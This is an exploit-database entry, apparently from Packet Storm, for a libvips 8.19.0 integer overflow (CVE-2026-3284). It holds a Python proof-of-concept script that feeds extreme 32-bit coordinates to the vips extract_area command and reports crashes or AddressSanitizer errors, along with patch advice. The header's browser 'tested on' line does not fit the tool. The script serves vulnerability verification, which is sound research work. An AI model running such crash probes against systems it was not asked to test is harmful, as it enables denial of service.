Share
## https://sploitus.com/exploit?id=PACKETSTORM:216458
=============================================================================================================================================
| # Title : libvips 8.19.0 vips_extract_area_build Local Integer Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.libvips.org/ |
=============================================================================================================================================
[+] Summary : This Python script performs an advanced security audit on the vips image processing tool (libvips 8.19.0), specifically targeting
the integer overflow vulnerability (CVE-2026-3284) in the function vips_extract_area_build.
[+] Key Features:
Safe Environment Setup:
Creates a large temporary image (10,000 ร 10,000) to avoid memory exhaustion while testing boundary conditions.
Verifies the existence of the vips binary before execution.
Targeted Probes:
Tests maximum and minimum 32-bit integer values and out-of-bounds scenarios for the extract_area arguments.
Monitors for crashes (SIGSEGV, SIGABRT) or AddressSanitizer errors.
Detailed Reporting:
Outputs a formatted table showing each test scenario, verdict (crash or safe), return code, and a snippet of stderr.
Cleanup:
Safely removes temporary input and output files after testing.
Purpose:
The script acts as a PoC for local exploitation of CVE-2026-3284, useful for security researchers to verify vulnerabilities before patching.
Applying the official patch (24795bb3d19d84f7b6f5ed86451ad556c8f2fe70) or updating libvips is strongly recommended.
[+] POC :
import subprocess
import os
import signal
import time
class VipsAdvancedAudit:
def __init__(self, binary_path="./vips"):
self.vips_bin = binary_path
self.in_file = f"audit_in_{int(time.time())}.v"
self.out_file = f"audit_out_{int(time.time())}.v"
self.results = []
def setup(self):
"""Sets up the test environment with a balanced size to avoid RAM exhaustion"""
print(f"[*] Initializing Audit on: {self.vips_bin}")
if not os.path.exists(self.vips_bin) and not subprocess.run(["which", self.vips_bin], capture_output=True).returncode == 0:
print(f"[-] Error: vips binary not found.")
return False
try:
subprocess.run([self.vips_bin, "black", self.in_file, "10000", "10000"],
capture_output=True, check=True)
return True
except Exception as e:
print(f"[-] Setup failed (possibly Disk space or Vips error): {e}")
return False
def probe(self, name, left, width):
"""Tests the scenario with precise error handling"""
env = os.environ.copy()
env["ASAN_OPTIONS"] = "detect_leaks=0:abort_on_error=1:halt_on_error=1"
cmd = [
self.vips_bin, "--vips-max-coord", "2147483647",
"extract_area", self.in_file, self.out_file,
str(left), "0", str(width), "10"
]
try:
proc = subprocess.run(cmd, env=env, capture_output=True, text=True, timeout=15)
ret_code = proc.returncode
stderr = proc.stderr
except subprocess.TimeoutExpired:
ret_code = -999
stderr = "Execution Timeout - Possible logic hang or heavy processing"
except Exception as e:
ret_code = -888
stderr = str(e)
is_crash = False
if ret_code is not None:
crash_signals = [-signal.SIGSEGV, -signal.SIGABRT, 134, 139, 11]
if ret_code in crash_signals or ret_code < 0:
is_crash = True
crash_keywords = ["AddressSanitizer", "SEGV", "segmentation fault", "buffer-overflow"]
if any(key in stderr.lower() for key in crash_keywords):
is_crash = True
verdict = "B0000M CRASH" if is_crash else "OK๏ธ REJECTED (Safe)"
self.results.append({
"name": name,
"status": verdict,
"code": ret_code,
"msg": stderr[:40].replace('\n', ' ')
})
def run_suite(self):
cases = [
("INT32 Max Overflow", 2147483647, 100),
("Negative Boundary Wrap", -2147483648, 1),
("Standard OOB", 50000, 10)
]
for name, l, w in cases:
self.probe(name, l, w)
def cleanup(self):
"""Safe cleanup of temporary files only"""
for f in [self.in_file, self.out_file]:
if os.path.exists(f):
try:
os.remove(f)
except:
pass
def report(self):
print("\n" + "="*95)
print(f"{'Scenario':<25} | {'Verdict':<20} | {'Code':<6} | {'Stderr Snippet'}")
print("-" * 95)
for r in self.results:
print(f"{r['name']:<25} | {r['status']:<20} | {r['code']:<6} | {r['msg']}")
print("="*95)
if __name__ == "__main__":
audit = VipsAdvancedAudit()
try:
if audit.setup():
audit.run_suite()
audit.report()
finally:
audit.cleanup()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================